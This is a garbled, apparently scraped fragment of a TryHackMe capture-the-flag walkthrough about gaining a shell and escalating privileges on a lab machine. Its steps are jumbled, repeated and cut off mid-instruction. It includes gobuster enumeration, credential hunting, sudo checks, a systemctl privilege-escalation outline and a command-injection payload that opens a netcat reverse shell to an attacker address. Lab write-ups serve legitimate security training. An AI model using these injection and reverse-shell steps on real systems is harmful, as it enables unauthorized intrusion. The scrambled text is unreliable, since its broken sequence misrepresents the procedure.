Cct2019 Tryhackme May 2026

Test for :

Read user.txt :

cat /home/mandy/user.txt Check sudo -l again as mandy – maybe mandy can run something as root. cct2019 tryhackme

Check /var/www/html for config files – sometimes credentials are hardcoded. find / -name user.txt 2>/dev/null Likely in /home/mandy/user.txt . But you don’t have read access yet. Step 4 – Privilege Escalation 4.1 Check Sudo Rights sudo -l If you see:

gobuster dir -u http://<target_ip> -w /usr/share/wordlists/dirb/common.txt or Test for : Read user

nc -lvnp 4444

User www-data may run (ALL, !root) /bin/systemctl That means www-data can run systemctl as any user . 4.2 Exploit systemctl Create a service file (e.g., privesc.service ): privesc.service ): 127.0.0.1

127.0.0.1; nc -e /bin/sh <your_ip> 4444 If -e not available, use: